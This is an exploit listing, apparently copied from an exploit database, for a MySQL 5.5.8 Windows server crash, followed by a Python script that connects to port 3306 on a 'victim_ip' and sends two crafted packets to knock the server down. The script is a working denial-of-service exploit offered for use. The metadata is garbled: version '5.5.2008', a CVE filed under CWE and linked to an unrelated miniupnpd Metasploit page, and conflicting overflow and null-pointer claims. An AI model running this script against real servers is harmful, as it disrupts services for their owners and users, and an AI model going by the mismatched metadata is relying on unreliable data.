MySQL 5.5.8 Null Ptr (windows)

vendor:

MySQL

by:

Level Smash the Stack

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MySQL

Affected Version From: 5.5.2008

Affected Version To: 5.5.2008

Patch Exists: YES

Related CWE: CVE-2013-0229

CPE: a:mysql:mysql:5.5.8

Metasploit: https://www.rapid7.com/db/vulnerabilities/miniupnpd-cve-2013-0229/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2013

MySQL 5.5.8 Null Ptr (windows)

This exploit is a buffer overflow vulnerability in MySQL 5.5.8 on Windows. It allows an attacker to send a specially crafted packet to the MySQL server, which will cause a null pointer dereference and crash the server. The exploit is triggered by sending two specially crafted packets to the MySQL server, the first packet contains a null byte followed by a 4 byte integer, and the second packet contains a specially crafted string. The exploit is triggered when the server attempts to process the second packet.

Mitigation:

Upgrade to the latest version of MySQL, or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

import socket, sys 

print "\n" 
print "----------------------------------------------------------------" 
print "| MySQL 5.5.8 Null Ptr (windows)                                |" 
print "| Level Smash the Stack                                         |" 
print "----------------------------------------------------------------" 
print "\n" 

buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

buf2=("\x11\x00\x00\x00\x03set autocommit30")

def usage(): 
print "usage : ./mysql.py <victim_ip>" 
print "example: ./mysql.py 192.168.1.22" 


def main(): 
if len(sys.argv) != 2: 
usage() 
sys.exit() 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

HOST = sys.argv[1] 
PORT = int(3306) 
s.connect((HOST,PORT)) 
print "[*] Connect" 
s.send(buf)
print "[*] Payload 1 sent"
s.send(buf2) 
print "[*] Payload 2 sent\n", "[*] Run again to ensure it is down..\n" 
s.close() 

if __name__ == "__main__": 
main()